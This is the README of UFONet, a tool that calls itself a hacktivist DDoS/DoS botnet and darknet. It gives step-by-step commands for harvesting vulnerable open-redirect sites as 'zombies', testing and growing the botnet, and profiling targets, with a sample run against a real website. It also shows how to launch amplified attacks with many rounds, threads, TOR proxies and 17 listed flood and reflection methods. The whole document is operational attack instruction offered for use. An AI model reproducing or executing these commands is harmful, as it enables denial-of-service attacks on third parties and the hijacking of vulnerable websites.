README.txt 15 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498
  1. ===========================================================================
  2. 888 888 8888888888 .d88888b. 888b 888 888
  3. 888 888 888 d88PY888b 8888b 888 888
  4. 888 888 888 888 888 88888b 888 888
  5. 888 888 8888888 888 888 888Y88b 888 .d88b. 888888
  6. 888 888 888 888 888 888 Y88b888 d8P Y8b 888
  7. 888 888 888 888 888 888 Y88888 88888888 888
  8. Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
  9. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
  10. ===========================================================================
  11. Welcome to UFONet [ DDoS+DoS ] Botnet/C&C/Darknet ;-)
  12. ===========================================================================
  13. ###############################
  14. # Project info
  15. ###############################
  16. - Website:
  17. https://ufonet.03c8.net
  18. - IRC:
  19. irc.freenode.net - #ufonet
  20. ###############################
  21. # FAQ
  22. ###############################
  23. https://ufonet.03c8.net/FAQ.html
  24. ###############################
  25. # Summary
  26. ###############################
  27. UFONet - Is a set of hacktivist tools that allow launching coordinated
  28. DDoS and DoS attacks and combine both in a single offensive.
  29. It also works as an encrypted DarkNET to publish and receive
  30. content by creating a global client/server network based on
  31. a direct-connect P2P architecture.
  32. ###############################
  33. # Installing
  34. ###############################
  35. UFONet runs on many platforms:
  36. You can try to automatically get all required libraries using (as root):
  37. python3 setup.py
  38. For manual installation, run:
  39. sudo apt-get install -y --no-install-recommends libpython3.11-dev python3-pycurl python3-geoip python3-whois python3-cryptography python3-requests libgeoip1 libgeoip-dev
  40. python3 -m pip install --upgrade pip --no-warn-script-location --root-user-action=ignore
  41. python3 -m pip install pycurl --upgrade --root-user-action=ignore
  42. python3 -m pip install GeoIP python-geoip pygeoip requests whois scapy pycryptodomex duckduckgo-search --ignore-installed --root-user-action=ignore
  43. ###############################
  44. # Searching for 'zombies'
  45. ###############################
  46. UFONet can dig on different search engines results to find possible 'Open Redirect' vulnerable sites.
  47. A common query string should be like this:
  48. 'page.php?url='
  49. 'check.cgi?url='
  50. 'checklink?uri='
  51. 'validator?uri='
  52. For example, you can begin a search with:
  53. ./ufonet -s 'page.php?url='
  54. Or providing a list of "dorks" from a file:
  55. ./ufonet --sd 'botnet/dorks.txt'
  56. By default UFONet will use a search engine called 'DuckDuckGo'. But you can choose a different one:
  57. ./ufonet -s 'page.php?url=' --se 'bing'
  58. You can also search massively using all search engines supported:
  59. ./ufonet -s 'page.php?url=' --sa
  60. To control how many 'zombies' recieved from the search engines reports you can use:
  61. ./ufonet --sd 'botnet/dorks.txt' --sa --sn 20
  62. Or you can make the tool to search for the maximun number of results automatically (this may take time!):
  63. ./ufonet --auto-search
  64. At the end of the process, you will be asked if you want to check the list retrieved to see
  65. if the urls are vulnerable.
  66. Do you want to check if the NEW possible zombies are valid? (Y/n)
  67. After that, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
  68. Do you want to update your army? (Y/n)
  69. If your answer is 'Y', your new 'zombies' will be appended to the file named: zombies.txt
  70. -------------
  71. Examples:
  72. + with verbose: ./ufonet -s 'page.php?url=' -v
  73. + with threads: ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100
  74. ###############################
  75. # Testing botnet
  76. ###############################
  77. UFONet can test if your 'zombies' are vulnerable and can be used for attacking tasks.
  78. For example, open 'botnet/zombies.txt' (or another file) and create a list of possible 'zombies'.
  79. Remember that urls of the 'zombies' should be like this:
  80. http://target.com/check?uri=
  81. After that, launch:
  82. ./ufonet -t 'botnet/zombies.txt'
  83. You can test for XML-RPC Pingback vulnerability related 'zombies', with:
  84. ./ufonet --test-rpc
  85. To check if your 'zombies' are still infected testing the whole botnet (this may take time!) try this:
  86. ./ufonet --test-all
  87. And to check if your 'zombies' are still online run:
  88. ./ufonet --test-offline
  89. Finally, you can order your 'zombies' to attack you and see how they reply to your needs using:
  90. ./ufonet --attack-me
  91. At the end of the process, you will be asked if you want to check the list retrieved to see
  92. if the urls are vulnerable.
  93. Do you want to check if the NEW possible zombies are valid? (Y/n)
  94. After that, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
  95. Do you want to update your army? (Y/n)
  96. If your answer is 'Y', the file: "botnet/zombies.txt" will be updated.
  97. -------------
  98. Examples:
  99. + with verbose: ./ufonet -t 'botnet/zombies.txt' -v
  100. + with proxy TOR: ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
  101. + with threads: ./ufonet -t 'botnet/zombies.txt' --threads 50
  102. + test whole botnet: ./ufonet --test-all
  103. + test XML-RPCs: ./ufonet --test-rpc
  104. + search for offlines: ./ufonet --test-offline
  105. + attack yourself: ./ufonet --attack-me
  106. ###############################
  107. # Inspecting a target
  108. ###############################
  109. UFONet can search for biggest file on your target by crawlering it:
  110. ./ufonet -i http://target.com
  111. You can use this before to attack to be more effective.
  112. ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
  113. -------------
  114. Example:
  115. +input:
  116. ./ufonet -i http://target.com
  117. +output:
  118. [...]
  119. +Image found: images/wizard.jpg
  120. (Size: 63798 Bytes)
  121. ------------
  122. +Style (.css) found: fonts.css
  123. (Size: 20448 Bytes)
  124. ------------
  125. +Webpage (.php) found: contact.php
  126. (Size: 2483 Bytes)
  127. ------------
  128. +Webpage (.php) found: about.php
  129. (Size: 1945 Bytes)
  130. ------------
  131. +Webpage (.php) found: license.php
  132. (Size: 1996 Bytes)
  133. ------------
  134. ================================================================================
  135. =Biggest File: http://target.com/images/wizard.jpg
  136. ================================================================================
  137. -------------
  138. ###############################
  139. # Abducting a target
  140. ###############################
  141. UFONet can provide you some interesting information about your target:
  142. ./ufonet -x http://target.com
  143. -------------
  144. Example:
  145. +input:
  146. ./ufonet -x https://yahoo.com
  147. +output:
  148. [...]
  149. -Target URL: https://yahoo.com
  150. -IP : 206.190.39.42
  151. -IPv6 : OFF
  152. -Port : 443
  153. -Domain: yahoo.com
  154. -Bytes in : 550.09 KB
  155. -Load time: 9.10 seconds
  156. -Banner: ATS
  157. -Vía : http/1.1 usproxy3.fp.ne1.yahoo.com (ApacheTrafficServer),
  158. http/1.1 media-router-fp25.prod.media.ir2.yahoo.com (ApacheTrafficServer [cMsSf ])
  159. -WAF/IDS: FIREWALL NOT PRESENT (or not discovered yet)! ;-)
  160. -Reports:
  161. + CVE-2017-7671 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7671
  162. + CVE-2017-5660 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5660
  163. [...]
  164. ---------
  165. [Info] Abduction finished... ;-)
  166. -------------
  167. ###############################
  168. # Attacking a target
  169. ###############################
  170. UFONet can attack your target in many different ways.
  171. For example, enter a target to attack with a number of rounds:
  172. ./ufonet -a http://target.com -r 10
  173. On this example UFONet will attack the target a number of 10 times for each 'zombie'. That means that
  174. if you have a list of 1.000 'zombies' it will launch 1.000 'zombies' x 10 rounds = 10.000 requests to the target.
  175. If you don't put any round it will apply only 1 by default.
  176. Additionally, you can choose a place to recharge on target's site. For example, a large image,
  177. a big size file or a flash movie. In some scenarios where targets doesn't use cache systems
  178. this will make the attack more effective.
  179. ./ufonet -a http://target.com -b "/images/big_size_image.jpg"
  180. -------------
  181. Examples:
  182. + with verbose: ./ufonet -a http://target.com -r 10 -v
  183. + with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
  184. + with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
  185. + with threads: ./ufonet -a http://target.com -r 10 --threads 500
  186. ###############################
  187. # Special attacks
  188. ###############################
  189. UFONet uses different ways to exploit 'Open Redirect' vulnerabilities.
  190. You can use UFONet to stress database on target by requesting random valid strings as search queries:
  191. ./ufonet -a http://target.com --db "search.php?q="
  192. Also, it exploits (by default) XML-RPC Pingback Vulnerability, generating callback requests and increasing
  193. processing required by target.
  194. You can test your list of 'XML-RPCs zombies' launching:
  195. ./ufonet --test-rpc
  196. ###############################
  197. # Extra attacks
  198. ###############################
  199. - LOIC: https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon
  200. - LORIS: https://en.wikipedia.org/wiki/Slowloris_(software)
  201. - UFOSYN: https://en.wikipedia.org/wiki/SYN_flood
  202. - FRAGGLE: https://en.wikipedia.org/wiki/Fraggle_attack
  203. - UFORST: https://ddos-guard.net/en/terminology/attack_type/rst-or-fin-flood
  204. - SPRAY: https://en.wikipedia.org/wiki/DRDOS
  205. - SMURF: https://en.wikipedia.org/wiki/Smurf_attack
  206. - XMAS: https://en.wikipedia.org/wiki/Christmas_tree_packet
  207. - DROPER: https://en.wikipedia.org/wiki/IP_fragmentation_attack
  208. - SNIPER: https://www.imperva.com/learn/application-security/snmp-reflection/
  209. - TACHYON: https://www.us-cert.gov/ncas/alerts/TA13-088A
  210. - PINGER: https://www.cloudflare.com/learning/ddos/ping-icmp-flood-ddos-attack/
  211. - MONLIST: https://www.us-cert.gov/ncas/alerts/TA14-013A
  212. - UFOACK: https://www.f5.com/services/resources/glossary/push-and-ack-flood
  213. - OVERLAP: https://cyberhoot.com/cybrary/fragment-overlap-attack/
  214. - UFOUDP: https://en.wikipedia.org/wiki/UDP_flood_attack
  215. - NUKE: https://dl.packetstormsecurity.net/papers/general/tcp-starvation.pdf
  216. All ways could be combined, so UFONet can attack DDoS and DoS, at the same time.
  217. ###############################
  218. # Updating
  219. ###############################
  220. UFONet has implemented an option to update the tool to the latest stable version.
  221. This feature can be used only if you have cloned it from a git respository.
  222. To check your version you should launch:
  223. ./ufonet --update
  224. This will update the tool automatically removing all files from old package.
  225. ###############################
  226. # Generating a 'Blackhole'
  227. ###############################
  228. UFONet has some P2P options to share/keep 'zombies' with other 'motherships'.
  229. * Setup web server with a folder "ufonet", this folder should be:
  230. - located in /var/www/ufonet (default debian/ubuntu install)
  231. - owned by the user running the blackhole
  232. - accessible with http://your-ip/ufonet/
  233. * Start the blackhole with: ./ufonet --blackhole (or python2 blackhole.py)
  234. * Anyone wanting to connect to your server needs to set the --up-to/--down-from
  235. to the ip address of your webserver...
  236. [!]WARNING : this *ADVANCED* function is *NOT* secure, proceed if you really want to.
  237. To start a new 'blackhole' launch:
  238. ./ufonet --blackhole
  239. ###############################
  240. # GUI/Web Interface
  241. ###############################
  242. You can manage UFONet using a Web Interface. The tool has implemented a python web server
  243. connected to the core providing you a more user friendly experience.
  244. To launch it use:
  245. ./ufonet --gui
  246. This will open a tab on your default browser with all features of the tool and some 'extra' options:
  247. - SHIP.NEWS: Allows to read last "news" published by a "mothership"
  248. - SHIP.MISSIONS: Allows to read last "missions" published by a "mothership"
  249. - SHIP.STATS: Allows to review statistics from your "spaceship"
  250. - SHIP.RANKING: Allows to check your "ranking" position
  251. - SHIP.LINKS: Allows to review links published by a "mothership"
  252. - SHIP.STREAMS: Allows to review streams (video/audio/live) published by a "mothership"
  253. - SHIP.TV: Allows to play videos published by a "mothership"
  254. - SHIP.GAMES: Allows to review games from your "spaceship"
  255. - SHIP.BROWSER: Allows to navigate/surf the Internet from a sandbox
  256. - SHIP.WARPS: Allows to interact with a "mothership" to download/upload "zombies"
  257. - GLOBAL.BOARD: Allows to send/receive messages to/from a "mothership" (a forum)
  258. - GLOBAL.GRID: Allows to review statistics from other "spaceships"
  259. - GLOBAL.WARGAMES: Allows to propose and join some real "wargames"
  260. - GLOBAL.RADAR: Allows to review locations published by other "motherships"
  261. - GLOBAL.NEWS: Allows to read news related to UFONet
  262. - [...]
  263. ###############################
  264. # Timelog
  265. ###############################
  266. --------------------------
  267. 25.08.2024 : v.1.9
  268. --------------------------
  269. --------------------------
  270. 02.03.2022 : v.1.8
  271. --------------------------
  272. --------------------------
  273. 14.07.2021 : v.1.7
  274. --------------------------
  275. --------------------------
  276. 17.08.2020 : v.1.6
  277. --------------------------
  278. --------------------------
  279. 08.06.2020 : v.1.5
  280. --------------------------
  281. --------------------------
  282. 01.02.2020 : v.1.4
  283. --------------------------
  284. --------------------------
  285. 10.03.2019 : v.1.3
  286. --------------------------
  287. --------------------------
  288. 03.02.2019 : v.1.2.1
  289. --------------------------
  290. --------------------------
  291. 31.12.2018 : v.1.2
  292. --------------------------
  293. --------------------------
  294. 26.09.2018 : v.1.1
  295. --------------------------
  296. --------------------------
  297. 08.03.2018 : v.1.0
  298. --------------------------
  299. --------------------------
  300. 14.07.2017 : v.0.9
  301. --------------------------
  302. --------------------------
  303. 21.10.2016 : v.0.8
  304. --------------------------
  305. --------------------------
  306. 17.08.2016 : v.0.7
  307. --------------------------
  308. --------------------------
  309. 05.11.2015 : v.0.6
  310. --------------------------
  311. --------------------------
  312. 24.05.2015 : v.0.5b
  313. --------------------------
  314. --------------------------
  315. 15.12.2014 : v.0.4b
  316. --------------------------
  317. --------------------------
  318. 27.09.2014 : v.0.3.1b
  319. --------------------------
  320. --------------------------
  321. 20.09.2014 : v.0.3b
  322. --------------------------
  323. --------------------------
  324. 22.06.2013 : v.0.2b
  325. --------------------------
  326. --------------------------
  327. 18.06.2013 : v.0.1b
  328. --------------------------
  329. ###############################
  330. # Thanks to
  331. ###############################
  332. - BP<3
  333. - UFo & Mandingo & Ikujam
  334. - Phineas Fisher ;-)
  335. - The Shadow Brokers (TSB) ;_)
  336. - World Wide Antifas >-)
  337. -------------------------
  338. ############